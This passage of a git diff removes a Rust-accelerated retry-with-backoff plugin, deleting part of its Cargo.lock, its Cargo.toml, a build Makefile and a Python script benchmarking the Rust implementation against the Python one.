"2334f11ee363607eb04df9b8fc8a13ca1715a72ba8662a26ac285c98aabb4011" -dependencies = [ - "winnow", -] - -[[package]] -name = "toml_writer" -version = "1.1.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d282ade6016312faf3e41e57ebbba0c073e4056dab1232ab1cb624199648f8ed" - -[[package]] -name = "unic-char-property" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" -dependencies = [ - "unic-char-range", -] - -[[package]] -name = "unic-char-range" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" - -[[package]] -name = "unic-common" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" - -[[package]] -name = "unic-emoji-char" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b07221e68897210270a38bde4babb655869637af0f69407f96053a34f76494d" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-ident" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-version" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" -dependencies = [ - "unic-common", -] - -[[package]] -name = "unicode-ident" -version = "1.0.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - -[[package]] -name = "unicode_names2" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d1673eca9782c84de5f81b82e4109dcfb3611c8ba0d52930ec4a9478f547b2dd" -dependencies = [ - "phf", - "unicode_names2_generator", -] - -[[package]] -name = "unicode_names2_generator" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b91e5b84611016120197efd7dc93ef76774f4e084cd73c9fb3ea4a86c570c56e" -dependencies = [ - "getopts", - "log", - "phf_codegen", - "rand", -] - -[[package]] -name = "wasi" -version = "0.11.1+wasi-snapshot-preview1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" - -[[package]] -name = "wasm-bindgen" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6532f9a5c1ece3798cb1c2cfdba640b9b3ba884f5db45973a6f442510a87d38e" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18a2d50fcf105fb33bb15f00e7a77b772945a2ee45dcf454961fd843e74c18e6" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "03ce4caeaac547cdf713d280eda22a730824dd11e6b8c3ca9e42247b25c631e3" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "75a326b8c223ee17883a4251907455a2431acc2791c98c26279376490c378c16" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "windows-core" -version = "0.62.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" -dependencies = [ - "windows-implement", - "windows-interface", - "windows-link", - "windows-result", - "windows-strings", -] - -[[package]] -name = "windows-implement" -version = "0.60.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-interface" -version = "0.59.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-result" -version = "0.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-strings" -version = "0.5.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" -dependencies = [ - "windows-link", -] - -[[package]] -name = "winnow" -version = "1.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a90e88e4667264a994d34e6d1ab2d26d398dcdca8b7f52bec8668957517fc7d8" - -[[package]] -name = "zerocopy" -version = "0.8.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "efbb2a062be311f2ba113ce66f697a4dc589f85e78a4aea276200804cea0ed87" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0e8bc7269b54418e7aeeef514aa68f8690b8c0489a06b0136e5f57c4c5ccab89" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/retry_with_backoff/Cargo.toml b/plugins_rust/retry_with_backoff/Cargo.toml deleted file mode 100644 index 6212052703..0000000000 --- a/plugins_rust/retry_with_backoff/Cargo.toml +++ /dev/null @@ -1,35 +0,0 @@ -[package] -name = "retry_with_backoff" -version = "0.1.0" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -description = "Rust-accelerated retry state manager for the retry-with-backoff plugin" - -[lib] -# cdylib = C-compatible dynamic library (what Python loads as a .so) -# rlib = Rust static library (needed for tests / benchmarks) -name = "retry_with_backoff_rust" -crate-type = ["cdylib", "rlib"] - -[[bin]] -name = "stub_gen" -path = "src/bin/stub_gen.rs" - -[dependencies] -log = "0.4.29" -# pyo3: the bridge between Python and Rust -# abi3-py311 = compile once, works on Python 3.11+ -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-log = "0.13.3" -pyo3-stub-gen = "0.19" - -# rand: random number generation — needed for full-jitter backoff -# ≈ Python's random.uniform() -rand = "0.8" - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true diff --git a/plugins_rust/retry_with_backoff/Makefile b/plugins_rust/retry_with_backoff/Makefile deleted file mode 100644 index 69b3f981cb..0000000000 --- a/plugins_rust/retry_with_backoff/Makefile +++ /dev/null @@ -1,236 +0,0 @@ -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# 🦀 RETRY-WITH-BACKOFF - Makefile -# Rust-accelerated retry state manager for the retry-with-backoff plugin -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# -# Usage: make or just `make help` -# -# help: 🦀 RETRY-WITH-BACKOFF (Rust + Python extension build & automation) -# ───────────────────────────────────────────────────────────────────────── - -# ============================================================================= -# 📖 DYNAMIC HELP -# ============================================================================= -.PHONY: help -help: - @grep '^# help\:' $(firstword $(MAKEFILE_LIST)) | sed 's/^# help\: //' - -# ============================================================================= -# 📦 PROJECT METADATA -# ============================================================================= -PACKAGE_NAME := retry_with_backoff -VERSION ?= $(shell cargo metadata --format-version 1 --no-deps 2>/dev/null | jq -r '.packages[0].version' || echo "0.1.0") -DIST_DIR := target -PYTHON ?= python3 - -# Colors for output -BLUE := \033[0;34m -GREEN := \033[0;32m -YELLOW:= \033[0;33m -RED := \033[0;31m -NC := \033[0m # No Color - -# ============================================================================= -# 🔍 LINTING & FORMAT -# ============================================================================= -# help: 🔍 LINTING & FORMAT -# help: fmt - Format Rust code with rustfmt -# help: fmt-check - Check Rust code formatting (CI) -# help: clippy - Run clippy lints -# help: cargo-check - Run cargo check -.PHONY: fmt fmt-check clippy cargo-check - -fmt: - @echo "$(GREEN)Formatting code...$(NC)" - cargo fmt - -fmt-check: - @echo "$(GREEN)Checking code format...$(NC)" - cargo fmt -- --check - -clippy: - @echo "$(GREEN)Running clippy...$(NC)" - cargo clippy -- -D warnings - -cargo-check: - @cargo check - -# ============================================================================= -# 🧪 TESTS -# ============================================================================= -# help: 🧪 TESTS -# help: test - Run Rust unit tests -# help: test-verbose - Run Rust tests with verbose output -# help: test-python - Run Python integration tests -# help: test-all - Run both Rust and Python tests -.PHONY: test test-verbose test-python test-all - -test: - @echo "$(GREEN)Running retry_with_backoff tests...$(NC)" - cargo test - -test-verbose: - @echo "$(GREEN)Running retry_with_backoff tests (verbose)...$(NC)" - cargo test -- --nocapture - -test-python: - @echo "$(GREEN)Running Python unit tests...$(NC)" - cd ../.. && uv run pytest -k retry_with_backoff -v - -test-all: test test-python - -# ============================================================================= -# 📊 COVERAGE -# ============================================================================= -# help: 📊 COVERAGE -# help: coverage-tools - Install cargo-llvm-cov and llvm-tools-preview -# help: coverage - Generate code coverage report with llvm-cov -# help: coverage-summary - Generate code coverage summary (aliases: cs, cov-sum) -.PHONY: coverage-tools coverage cov cv coverage-summary cs cov-sum - -coverage-tools: - @echo "$(GREEN)Installing cargo-llvm-cov and llvm-tools-preview...$(NC)" - @cargo install cargo-llvm-cov - @rustup component add llvm-tools-preview - @echo "$(GREEN)Coverage tools installed$(NC)" - -coverage cov cv: coverage-tools - @echo "$(GREEN)Generating code coverage report...$(NC)" - @cargo llvm-cov --html --ignore-filename-regex "src/bin/.*" - @echo "$(GREEN)Coverage report generated at target/llvm-cov/html/index.html$(NC)" - @xdg-open target/llvm-cov/html/index.html 2>/dev/null || true - -coverage-summary cs cov-sum: coverage-tools - @echo "$(GREEN)Generating code coverage summary...$(NC)" - @cargo llvm-cov --summary-only --ignore-filename-regex "src/bin/.*" - -# ============================================================================= -# 🛠 BUILD (maturin for Python extension) -# ============================================================================= -# help: 🛠 BUILD -# help: build - Build release extension (no install) -# help: build-target - Build for specific target (use TARGET=...) -# help: stub-gen - Generate Python type stubs (.pyi files) -# help: install - Build and install wheel -.PHONY: stub-gen build build-target install - -stub-gen: - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @cargo run --bin stub_gen - @echo "$(GREEN)Type stubs generated$(NC)" - -build: stub-gen - @echo "$(GREEN)Building $(PACKAGE_NAME)...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/retry_with_backoff/Cargo.toml - @echo "$(GREEN)Build complete$(NC)" - -build-target: stub-gen - @echo "$(GREEN)Building for target: $(TARGET)...$(NC)" - @uv run maturin build --release --target $(TARGET) - @echo "$(GREEN)Build complete for $(TARGET)$(NC)" - -install: stub-gen - @echo "$(GREEN)Installing $(PACKAGE_NAME) plugin...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/retry_with_backoff/Cargo.toml - @echo "$(GREEN)Installation complete$(NC)" - -# ============================================================================= -# 📊 BENCHMARKS -# ============================================================================= -# help: 📊 BENCHMARKS -# help: bench - Run Criterion benchmarks (skipped — no benches) -# help: bench-compare - Compare against baseline -# help: benchmark - Run Rust vs Python performance comparison -# help: benchmark-quick - Quick benchmark (100 iterations, 10 warmup) -.PHONY: bench bench-baseline bench-compare compare benchmark benchmark-quick - -bench: - @echo "$(YELLOW)No Criterion benchmarks defined for $(PACKAGE_NAME) — skipping$(NC)" - -bench-baseline: - @echo "$(YELLOW)No benchmarks defined for $(PACKAGE_NAME) — skipping$(NC)" - -bench-compare: - @echo "$(YELLOW)No benchmarks defined for $(PACKAGE_NAME) — skipping$(NC)" - -compare: install - @echo "$(GREEN)Running performance comparison (Python vs Rust)...$(NC)" - @echo "$(YELLOW)Installing plugin first...$(NC)" - @$(MAKE) --no-print-directory install - @echo "" - @echo "$(YELLOW)Running comparison script...$(NC)" - cd ../../ && uv run python3 plugins_rust/retry_with_backoff/compare_performance.py - -benchmark: install - @echo "$(GREEN)Running Rust vs Python performance comparison...$(NC)" - @echo "" - cd ../../ && uv run python3 plugins_rust/retry_with_backoff/compare_performance.py - -benchmark-quick: install - @echo "$(GREEN)Running quick performance comparison (100 iterations)...$(NC)" - @echo "" - cd ../../ && uv run python3 plugins_rust/retry_with_backoff/compare_performance.py --iterations 100 --warmup 10 - -# ============================================================================= -# 🧹 CLEANUP -# ============================================================================= -# help: 🧹 CLEANUP -# help: clean - Remove build artifacts -# help: clean-all - Remove all build artifacts including wheels -# help: uninstall - Uninstall plugin from Python environment -.PHONY: clean clean-all uninstall - -uninstall: - @echo "$(YELLOW)Uninstalling $(PACKAGE_NAME)...$(NC)" - @uv pip uninstall -y $(PACKAGE_NAME) 2>/dev/null || pip uninstall -y $(PACKAGE_NAME) 2>/dev/null || true - @echo "$(GREEN)$(PACKAGE_NAME) uninstalled$(NC)" - -clean: - @echo "$(YELLOW)Cleaning build artifacts...$(NC)" - cargo clean - rm -rf target/ - rm -rf coverage/ - find . -type f -name "*.whl" -delete - find . -type f -name "*.pyc" -delete - find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true - -clean-all: clean - @echo "$(RED)Cleaning all generated files...$(NC)" - rm -rf ~/.cargo/registry/cache/ - rm -rf ~/.cargo/git/db/ - -# ============================================================================= -# 📚 DOCUMENTATION -# ============================================================================= -# help: 📚 DOCUMENTATION -# help: doc - Generate Rust documentation -# help: doc-open - Generate and open documentation -.PHONY: doc doc-open - -doc: - @echo "$(GREEN)Building documentation...$(NC)" - cargo doc --no-deps --document-private-items - -doc-open: doc - @echo "$(GREEN)Opening documentation...$(NC)" - cargo doc --no-deps --document-private-items --open - -# ============================================================================= -# 🔧 DEVELOPMENT HELPERS -# ============================================================================= -# help: 🔧 DEVELOPMENT HELPERS -# help: verify - Verify plugin installation -# help: check-all - Run all checks (fmt, clippy, test) -.PHONY: verify check-all - -verify: - @echo "$(GREEN)Verifying $(PACKAGE_NAME) installation...$(NC)" - @uv run python -c "import retry_with_backoff_rust; print('✅ retry_with_backoff_rust available')" || echo "⚠️ retry_with_backoff_rust not installed" - -check-all: fmt-check clippy test - @echo "$(GREEN)✔ All checks passed$(NC)" - -# --------------------------------------------------------------------------- -# Default goal -# --------------------------------------------------------------------------- -.DEFAULT_GOAL := help diff --git a/plugins_rust/retry_with_backoff/compare_performance.py b/plugins_rust/retry_with_backoff/compare_performance.py deleted file mode 100755 index b10495e7a6..0000000000 --- a/plugins_rust/retry_with_backoff/compare_performance.py +++ /dev/null @@ -1,624 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -"""Performance comparison: Rust vs Python for retry_with_backoff plugin. - -This benchmark provides a fair apples-to-apples comparison by using native -Python objects for both implementations, eliminating JSON serialization overhead. - -Measurements: -- Python (native): Baseline Python implementation -- Rust (native): High-performance Rust implementation via PyO3 - -Usage: - python compare_performance.py - python compare_performance.py --iterations 10000 --warmup 100 -""" - -import argparse -import random -import statistics -import sys -import time -from pathlib import Path -from typing import Any, Dict, List, Optional, Tuple - -# --------------------------------------------------------------------------- -# Import Rust implementation -# --------------------------------------------------------------------------- -try: - from retry_with_backoff_rust.retry_with_backoff_rust import ( - RetryStateManager as RustRetryStateManager, - ) - - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - RustRetryStateManager = None - print("⚠️ Rust implementation not available. Build it with:") - print(" cd plugins_rust/retry_with_backoff && make install") - print() - -# --------------------------------------------------------------------------- -# Import Python implementation -# --------------------------------------------------------------------------- -plugins_path = Path(__file__).parent.parent.parent / "plugins" / "retry_with_backoff" -if plugins_path.exists(): - sys.path.insert(0, str(plugins_path)) - mcpgateway_path = Path(__file__).parent.parent.parent / "mcpgateway" - if mcpgateway_path.exists(): - sys.path.insert(0, str(mcpgateway_path)) -else: - print(f"⚠️ Warning: Python implementation path not found: {plugins_path}") - print() - -try: - from retry_with_backoff import ( - RetryConfig, - _ToolRetryState, - _compute_delay_ms, - _del_state, - _get_state, - _is_failure, - ) - - PYTHON_AVAILABLE = True -except ImportError as e: - PYTHON_AVAILABLE = False - print(f"⚠️ Python implementation not available: {e}") - print(" Make sure pydantic is installed: uv pip install pydantic") - print() - - -# --------------------------------------------------------------------------- -# Python fallback implementation (mirrors Rust logic) -# --------------------------------------------------------------------------- - - -class PythonRetryStateManager: - """Python implementation mirroring Rust RetryStateManager API.""" - - def __init__( - self, - max_retries: int, - base_ms: int, - max_ms: int, - jitter: bool, - retry_on_status: List[int], - ): - self.max_retries = max_retries - self.base_ms = base_ms - self.max_ms = max_ms - self.jitter = jitter - self.retry_on_status = set(retry_on_status) - self._state: Dict[str, _ToolRetryState] = {} - - def _make_key(self, tool: str, request_id: str) -> str: - return f"{tool}:{request_id}" - - def check_and_update( - self, - tool: str, - request_id: str, - is_error: bool, - status_code: Optional[int], - ) -> Tuple[bool, int]: - """Check failure and update state, returning (should_retry, delay_ms).""" - failed = is_error or (status_code is not None and status_code in self.retry_on_status) - - key = self._make_key(tool, request_id) - - if failed: - state = self._state.get(key) - if state is None: - state = _ToolRetryState() - self._state[key] = state - - state.consecutive_failures += 1 - state.last_failure_at = time.monotonic() - - if state.consecutive_failures <= self.max_retries: - attempt = state.consecutive_failures - 1 - delay = _compute_delay_ms( - attempt, - RetryConfig( - max_retries=self.max_retries, - backoff_base_ms=self.base_ms, - max_backoff_ms=self.max_ms, - jitter=self.jitter, - retry_on_status=list(self.retry_on_status), - ), - ) - return (True, delay) - else: - self._del_state(tool, request_id) - return (False, 0) - else: - self._del_state(tool, request_id) - return (False, 0) - - def _del_state(self, tool: str, request_id: str) -> None: - key = self._make_key(tool, request_id) - self._state.pop(key, None) - - -# --------------------------------------------------------------------------- -# Benchmark functions -# --------------------------------------------------------------------------- - - -def benchmark_implementation( - impl: Any, - tool_names: List[str], - request_ids: List[str], - failure_rate: float, - iterations: int, - warmup: int = 5, -) -> Tuple[List[float], int]: - """Benchmark an implementation (Python or Rust). - - Args: - impl: RetryStateManager instance (Python or Rust) - tool_names: List of tool names to simulate - request_ids: List of request IDs to simulate - failure_rate: Fraction of calls that should fail (0.0-1.0) - iterations: Number of benchmark iterations - warmup: Number of warmup iterations - - Returns: - Tuple of (list of times in seconds, retry count) - """ - # Warmup phase - for _ in range(warmup): - for tool in tool_names[:3]: - for req_id in request_ids[:3]: - is_error = random.random() < failure_rate - status_code = 503 if is_error and random.random() < 0.7 else None - impl.check_and_update(tool, req_id, is_error, status_code) - - # Benchmark phase - times = [] - retry_count = 0 - - random.seed(42) # Reproducible results - - for _ in range(iterations): - start = time.perf_counter() - - for tool in tool_names: - for req_id in request_ids: - is_error = random.random() < failure_rate - if is_error: - status_code = 503 if random.random() < 0.7 else None - else: - status_code = None - - should_retry, _ = impl.check_and_update(tool, req_id, is_error, status_code) - if should_retry: - retry_count += 1 - - times.append(time.perf_counter() - start) - - return times, retry_count - - -def run_load_scenario( - name: str, - tool_count: int, - request_count: int, - failure_rate: float, - iterations: int, - warmup: int, -) -> Optional[Dict[str, Any]]: - """Run load-based benchmark scenario. - - Returns: - Dictionary with scenario results, or None if benchmark failed. - """ - print(f"\n{'=' * 70}") - print(f"Scenario: {name}") - print(f" Tools: {tool_count}, Requests: {request_count}, Failure rate: {failure_rate:.0%}") - print(f"{'=' * 70}") - - tool_names = [f"tool_{i}" for i in range(tool_count)] - request_ids = [f"req_{i}" for i in range(request_count)] - - config = { - "max_retries": 3, - "base_ms": 100, - "max_ms": 5000, - "jitter": False, # Disabled for consistent measurements - "retry_on_status": [429, 500, 502, 503, 504], - } - - results = {} - - # Benchmark Python - if PYTHON_AVAILABLE: - print("Running Python...", end=" ", flush=True) - py_impl = PythonRetryStateManager(**config) - py_times, py_retries = benchmark_implementation(py_impl, tool_names, request_ids, failure_rate, iterations, warmup) - py_mean = statistics.mean(py_times) * 1_000_000 # Convert to microseconds - py_median = statistics.median(py_times) * 1_000_000 - py_stdev = statistics.stdev(py_times) * 1_000_000 if len(py_times) > 1 else 0 - results["python"] = { - "mean": py_mean, - "median": py_median, - "stdev": py_stdev, - "retries": py_retries, - } - print(f"✓ ({py_mean:.3f} µs/iter, {py_retries} retries)") - else: - print("Running Python... ✗ (not available)") - - # Benchmark Rust - if RUST_AVAILABLE: - print("Running Rust...", end=" ", flush=True) - rust_impl = RustRetryStateManager(**config) - rust_times, rust_retries = benchmark_implementation(rust_impl, tool_names, request_ids, failure_rate, iterations, warmup) - rust_mean = statistics.mean(rust_times) * 1_000_000 # Convert to microseconds - rust_median = statistics.median(rust_times) * 1_000_000 - rust_stdev = statistics.stdev(rust_times) * 1_000_000 if len(rust_times) > 1 else 0 - results["rust"] = { - "mean": rust_mean, - "median": rust_median, - "stdev": rust_stdev, - "retries": rust_retries, - } - print(f"✓ ({rust_mean:.3f} µs/iter, {rust_retries} retries)") - else: - print("Running Rust... ✗ (not available)") - - # Calculate and display results - print("\n📊 Results:") - - if "python" in results: - py = results["python"] - print(f" Python: {py['mean']:>10.3f} µs ±{py['stdev']:>8.3f} (median: {py['median']:>10.3f})") - - if "rust" in results: - rust = results["rust"] - print(f" Rust: {rust['mean']:>10.3f} µs ±{rust['stdev']:>8.3f} (median: {rust['median']:>10.3f})") - - speedup = None - if "python" in results and "rust" in results: - speedup = py_mean / rust_mean if rust_mean > 0 else 0 - print(f"\n 🚀 Speedup: {speedup:.2f}x faster with Rust") - - if abs(py_retries - rust_retries) > py_retries * 0.01: - print(f"\n ⚠️ WARNING: Different retry counts! Python={py_retries}, Rust={rust_retries}") - else: - print(f" ✓ Retry counts match (Python={py_retries}, Rust={rust_retries})") - - return { - "name": name, - "type": "load", - "config": {"tools": tool_count, "requests": request_count, "failure_rate": failure_rate}, - "python": results.get("python"), - "rust": results.get("rust"), - "speedup": speedup, - } - - -def reset_state(): - """Reset Python state between benchmarks.""" - if PYTHON_AVAILABLE: - from retry_with_backoff import _STATE - - _STATE.clear() - - -def benchmark_sequential( - impl_name: str, - calls: List[Dict[str, Any]], - config: RetryConfig, - rust_mgr: Optional[Any] = None, - warmup: int = 5, -) -> Tuple[List[float], int]: - """Benchmark sequential call pattern (original compare_performance.py style).""" - reset_state() - - times = [] - retry_count = 0 - tool = "test_tool" - - # Warmup - for i in range(warmup): - if impl_name == "python": - _get_state(tool, f"warmup_{i}") - _del_state(tool, f"warmup_{i}") - else: - pass # Rust handles state internally - - for i, call in enumerate(calls): - req_id = f"seq_{i}" - start = time.perf_counter() - - if impl_name == "python": - result = {"isError": call["is_error"], "content": [], "structuredContent": None} - if call["status_code"] is not None: - result["structuredContent"] = {"status_code": call["status_code"]} - - st = _get_state(tool, req_id) - if _is_failure(result, config): - st.consecutive_failures += 1 - if st.consecutive_failures <= config.max_retries: - _compute_delay_ms(st.consecutive_failures - 1, config) - retry_count += 1 - _del_state(tool, req_id) - else: - _del_state(tool, req_id) - else: - _del_state(tool, req_id) - else: - # Rust - should_retry, _ = rust_mgr.check_and_update(tool, req_id, call["is_error"], call["status_code"]) - if should_retry: - retry_count += 1 - - times.append(time.perf_counter() - start) - - return times, retry_count - - -def run_sequential_scenario( - name: str, - calls: List[Dict[str, Any]], - config: RetryConfig, - warmup: int, -) -> Optional[Dict[str, Any]]: - """Run sequential call pattern scenario. - - Returns: - Dictionary with scenario results, or None if benchmark failed. - """ - print(f"\n{'=' * 70}") - print(f"Scenario: {name}") - print(f"{'=' * 70}") - - results = {} - - # Python - if PYTHON_AVAILABLE: - print("Running Python...", end=" ", flush=True) - py_times, py_count = benchmark_sequential("python", calls, config, warmup) - py_mean = statistics.mean(py_times) * 1_000_000 - py_median = statistics.median(py_times) * 1_000_000 - py_stdev = statistics.stdev(py_times) * 1_000_000 if len(py_times) > 1 else 0 - results["python"] = { - "mean": py_mean, - "median": py_median, - "stdev": py_stdev, - "retries": py_count, - } - print(f"✓ ({py_mean:.3f} µs/call, {py_count} retries)") - else: - print("Running Python... ✗ (not available)") - - # Rust - if RUST_AVAILABLE: - rust_mgr = RustRetryStateManager( - config.max_retries, - config.backoff_base_ms, - config.max_backoff_ms, - config.jitter, - config.retry_on_status, - ) - print("Running Rust...", end=" ", flush=True) - rust_times, rust_count = benchmark_sequential("rust", calls, config, rust_mgr=rust_mgr, warmup=warmup) - rust_mean = statistics.mean(rust_times) * 1_000_000 - rust_median = statistics.median(rust_times) * 1_000_000 - rust_stdev = statistics.stdev(rust_times) * 1_000_000 if len(rust_times) > 1 else 0 - results["rust"] = { - "mean": rust_mean, - "median": rust_median, - "stdev": rust_stdev, - "retries": rust_count, - } - print(f"✓ ({rust_mean:.3f} µs/call, {rust_count} retries)") - else: - print("Running Rust... ✗ (not available)") - - print("\n📊 Results:") - if "python" in results: - py = results["python"] - print(f" Python: {py['mean']:>10.3f} µs ±{py['stdev']:>8.3f} (median: {py['median']:>10.3f})") - if "rust" in results: - rust = results["rust"] - print(f" Rust: {rust['mean']:>10.3f} µs ±{rust['stdev']:>8.3f} (median: {rust['median']:>10.3f})") - - speedup = None - if "python" in results and "rust" in results: - speedup = py_mean / rust_mean if rust_mean > 0 else 0 - print(f"\n 🚀 Speedup: {speedup:.2f}x faster with Rust") - if py_count != rust_count: - print(f"\n ⚠️ WARNING: Different retry counts! Python={py_count}, Rust={rust_count}") - - return { - "name": name, - "type": "sequential", - "python": results.get("python"), - "rust": results.get("rust"), - "speedup": speedup, - } - - -def generate_sequential_scenarios(iterations: int) -> List[Dict[str, Any]]: - """Generate sequential test scenarios with different failure patterns.""" - scenarios = [] - - scenarios.append( - { - "name": "All successes", - "calls": [{"is_error": False, "status_code": None} for _ in range(iterations)], - } - ) - - scenarios.append( - { - "name": "All failures (exhaust)", - "calls": [{"is_error": True, "status_code": None} for _ in range(iterations)], - } - ) - - scenarios.append( - { - "name": "Mixed (50/50)", - "calls": [{"is_error": (i % 2 == 0), "status_code": None} for i in range(iterations)], - } - ) - - scenarios.append( - { - "name": "Rate limiting (429)", - "calls": [{"is_error": False, "status_code": 429 if i % 3 == 0 else 200} for i in range(iterations)], - } - ) - - scenarios.append( - { - "name": "Server errors", - "calls": [ - { - "is_error": False, - "status_code": [500, 502, 503][i % 3] if i % 4 != 0 else 200, - } - for i in range(iterations) - ], - } - ) - - return scenarios - - -def main(): - """Run performance comparison benchmarks.""" - parser = argparse.ArgumentParser(description="Rust vs Python performance comparison for retry_with_backoff") - parser.add_argument( - "--iterations", - type=int, - default=10000, - help="Benchmark iterations per scenario", - ) - parser.add_argument( - "--warmup", - type=int, - default=100, - help="Warmup iterations", - ) - args = parser.parse_args() - - print("🔄 Retry With Backoff Performance Comparison") - print(f"{'=' * 70}") - print(f"Iterations: {args.iterations} (+ {args.warmup} warmup)") - print(f"Rust available: {'✓' if RUST_AVAILABLE else '✗'}") - print(f"Python available: {'✓' if PYTHON_AVAILABLE else '✗'}") - - if not RUST_AVAILABLE and not PYTHON_AVAILABLE: - print("\n❌ Error: Neither implementation is available!") - print(" Install at least one implementation to run benchmarks.") - sys.exit(1) - - config = RetryConfig( - max_retries=3, - backoff_base_ms=200, - max_backoff_ms=5000, - jitter=False, - retry_on_status=[429, 500, 502, 503, 504], - ) - - all_results: List[Dict[str, Any]] = [] - - print("\n" + "=" * 70) - print("PART 1: Sequential Call Patterns (per-call overhead)") - print("=" * 70) - - sequential_scenarios = generate_sequential_scenarios(min(args.iterations, 1000)) - for scenario in sequential_scenarios: - result = run_sequential_scenario( - scenario["name"], - scenario["calls"], - config, - args.warmup, - ) - if result: - all_results.append(result) - - print("\n" + "=" * 70) - print("PART 2: Concurrent Load Patterns (batch throughput)") - print("=" * 70) - - load_scenarios = [ - ("Low load (1 tool, 10 reqs, 10% fail)", 1, 10, 0.1), - ("Medium load (5 tools, 50 reqs, 30% fail)", 5, 50, 0.3), - ("High load (10 tools, 100 reqs, 50% fail)", 10, 100, 0.5), - ("Stress test (20 tools, 200 reqs, 70% fail)", 20, 200, 0.7), - ] - - for name, tool_count, request_count, failure_rate in load_scenarios: - result = run_load_scenario( - name, - tool_count, - request_count, - failure_rate, - args.iterations, - args.warmup, - ) - if result: - all_results.append(result) - - # Display summary - print(f"\n{'=' * 70}") - print("📊 PERFORMANCE SUMMARY") - print(f"{'=' * 70}") - - if all_results: - # Calculate overall statistics - speedups = [r["speedup"] for r in all_results if r["speedup"] is not None] - - if speedups: - avg_speedup = statistics.mean(speedups) - min_speedup = min(speedups) - max_speedup = max(speedups) - - print("\n🚀 Rust Speedup Overview:") - print(f" Average: 